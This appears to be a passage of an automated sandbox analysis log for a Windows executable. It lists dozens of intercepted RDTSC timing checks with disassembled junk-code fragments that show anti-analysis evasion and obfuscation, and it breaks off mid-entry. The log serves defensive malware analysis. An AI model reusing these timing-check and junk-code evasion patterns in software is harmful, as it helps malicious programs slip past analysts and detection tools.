              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64AFA6 second address: 64AFF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FBBF0D5FF5Ch 0x0000000f jl 00007FBBF0D5FF6Ah 0x00000015 jmp 00007FBBF0D5FF64h 0x0000001a popad 0x0000001b nop 0x0000001c and edx, 7D190F53h 0x00000022 jbe 00007FBBF0D5FF57h 0x00000028 push 00000000h 0x0000002a sbb dx, 0CEFh 0x0000002f push 08DF685Bh 0x00000034 push eax 0x00000035 push edx 0x00000036 push ebx 0x00000037 pushad 0x00000038 popad 0x00000039 pop ebx 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B0EF second address: 64B106 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FBBF10EAAFCh 0x00000011 jnc 00007FBBF10EAAF6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B1A5 second address: 64B1AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B1AC second address: 64B1CC instructions: 0x00000000 rdtsc 0x00000002 js 00007FBBF10EAAF8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jmp 00007FBBF10EAAFFh 0x00000015 pop eax 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B1CC second address: 64B1D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B2F8 second address: 64B31A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EAB03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FBBF10EAAFCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B31A second address: 64B31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B31E second address: 64B323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B323 second address: 64B36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a adc si, F774h 0x0000000f push 00000000h 0x00000011 mov dl, 05h 0x00000013 mov dh, ah 0x00000015 push 737A224Ch 0x0000001a jp 00007FBBF0D5FF5Ah 0x00000020 xor dword ptr [esp], 737A22CCh 0x00000027 push 00000003h 0x00000029 mov dword ptr [ebp+122D38D9h], edi 0x0000002f push 00000000h 0x00000031 adc dh, FFFFFFCBh 0x00000034 push 00000003h 0x00000036 mov dword ptr [ebp+122D2A5Ch], edi 0x0000003c push 627A9B51h 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 push edi 0x00000045 pop edi 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B36D second address: 64B3D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FBBF10EAAF8h 0x0000000c popad 0x0000000d add dword ptr [esp], 5D8564AFh 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007FBBF10EAAF8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edi, 3EC18AF0h 0x00000033 lea ebx, dword ptr [ebp+1244FEBFh] 0x00000039 or esi, dword ptr [ebp+122D2CAFh] 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jp 00007FBBF10EAB0Dh 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C92E second address: 66C956 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jns 00007FBBF0D5FF56h 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FBBF0D5FF65h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C956 second address: 66C972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBF10EAB07h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AB72 second address: 66AB76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B102 second address: 66B10C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FBBF10EAAF6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B10C second address: 66B110 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B110 second address: 66B11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B291 second address: 66B2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 je 00007FBBF0D5FF56h 0x0000000c jmp 00007FBBF0D5FF67h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007FBBF0D5FF5Bh 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B41C second address: 66B428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FBBF10EAAF6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B428 second address: 66B42C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B42C second address: 66B432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B432 second address: 66B43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B43E second address: 66B442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B80F second address: 66B815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B815 second address: 66B81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6630A2 second address: 6630A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6630A8 second address: 6630BC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBBF10EAAF6h 0x00000008 jp 00007FBBF10EAAF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6630BC second address: 6630C2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63EE31 second address: 63EE5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FBBF10EAAF8h 0x0000000c jne 00007FBBF10EAAF8h 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007FBBF10EAAFBh 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BAE1 second address: 66BAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BAE5 second address: 66BAF5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBBF10EAAF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BAF5 second address: 66BAFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BAFB second address: 66BB05 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBBF10EAAF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C0B6 second address: 66C0BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C0BA second address: 66C0D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBF10EAAFDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C0D0 second address: 66C0D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C386 second address: 66C3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 ja 00007FBBF10EAAF6h 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 jmp 00007FBBF10EAAFDh 0x00000019 push eax 0x0000001a pop eax 0x0000001b pop eax 0x0000001c push esi 0x0000001d jo 00007FBBF10EAAF6h 0x00000023 jmp 00007FBBF10EAAFBh 0x00000028 pop esi 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6366CE second address: 636712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBBF0D5FF56h 0x0000000a jmp 00007FBBF0D5FF5Bh 0x0000000f popad 0x00000010 pop ecx 0x00000011 pushad 0x00000012 jmp 00007FBBF0D5FF69h 0x00000017 push edi 0x00000018 jmp 00007FBBF0D5FF5Eh 0x0000001d pop edi 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636712 second address: 636718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674009 second address: 674010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674010 second address: 674030 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FBBF10EAAF6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edi 0x00000011 jnc 00007FBBF10EAAF6h 0x00000017 pop edi 0x00000018 jl 00007FBBF10EAAFCh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674162 second address: 674166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674166 second address: 67416A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6728C8 second address: 6728DB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FBBF0D5FF58h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6728DB second address: 6728E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6728E1 second address: 6728E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674237 second address: 67423C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6743CC second address: 6743D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6743D4 second address: 6743E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676B18 second address: 676B24 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBBF0D5FF56h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676B24 second address: 676B29 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AE23 second address: 67AE2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63BA30 second address: 63BA34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63BA34 second address: 63BA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBBF0D5FF5Dh 0x0000000f jc 00007FBBF0D5FF5Ah 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A5C8 second address: 67A5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A5CE second address: 67A5F8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jp 00007FBBF0D5FF56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e jmp 00007FBBF0D5FF64h 0x00000013 jl 00007FBBF0D5FF5Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AB6D second address: 67AB7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FBBF10EAAF6h 0x00000009 je 00007FBBF10EAAF6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CFDA second address: 67CFDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CFDE second address: 67CFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D118 second address: 67D11D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D11D second address: 67D123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D24E second address: 67D254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D328 second address: 67D32E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D32E second address: 67D332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D8E8 second address: 67D952 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBBF10EAAF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FBBF10EAB05h 0x00000010 xchg eax, ebx 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FBBF10EAAF8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b jns 00007FBBF10EAB0Bh 0x00000031 adc si, 18EDh 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jnc 00007FBBF10EAAF8h 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67DDBD second address: 67DDC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67DDC3 second address: 67DDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67DEDB second address: 67DEE5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBBF0D5FF56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E3D9 second address: 67E3DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E3DF second address: 67E3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67FB9F second address: 67FBA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67EB0B second address: 67EB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F41C second address: 67F420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68069D second address: 6806D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push ebx 0x00000007 jmp 00007FBBF0D5FF5Ah 0x0000000c pop ebx 0x0000000d nop 0x0000000e push 00000000h 0x00000010 sub dword ptr [ebp+122D2A1Eh], esi 0x00000016 mov edi, ebx 0x00000018 push 00000000h 0x0000001a sub dword ptr [ebp+122D3086h], ecx 0x00000020 push eax 0x00000021 pushad 0x00000022 pushad 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jp 00007FBBF0D5FF56h 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680434 second address: 680438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6806D2 second address: 6806D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681C4F second address: 681C60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EAAFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680EC3 second address: 680EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681C60 second address: 681CA8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBBF10EAAF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d stc 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D26DBh], eax 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007FBBF10EAAF8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov esi, dword ptr [ebp+122D332Ah] 0x00000038 xchg eax, ebx 0x00000039 push ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c jg 00007FBBF10EAAF6h 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680EC9 second address: 680ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681CA8 second address: 681CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681CAC second address: 681CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBBF0D5FF5Ch 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685A13 second address: 685A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FBBF10EAAF6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685A1D second address: 685A21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686B14 second address: 686B1A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686B1A second address: 686B24 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBBF10EEF9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686BAC second address: 686BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686BB2 second address: 686BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 688B74 second address: 688B7E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBBF0522A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 689D0A second address: 689D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push eax 0x00000007 ja 00007FBBF10EEF9Eh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FBBF10EEF98h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov edi, 146855D6h 0x0000002d push 00000000h 0x0000002f mov di, si 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007FBBF10EEF98h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e sub dword ptr [ebp+122D2E9Bh], ebx 0x00000054 xchg eax, esi 0x00000055 push ecx 0x00000056 push ebx 0x00000057 pushad 0x00000058 popad 0x00000059 pop ebx 0x0000005a pop ecx 0x0000005b push eax 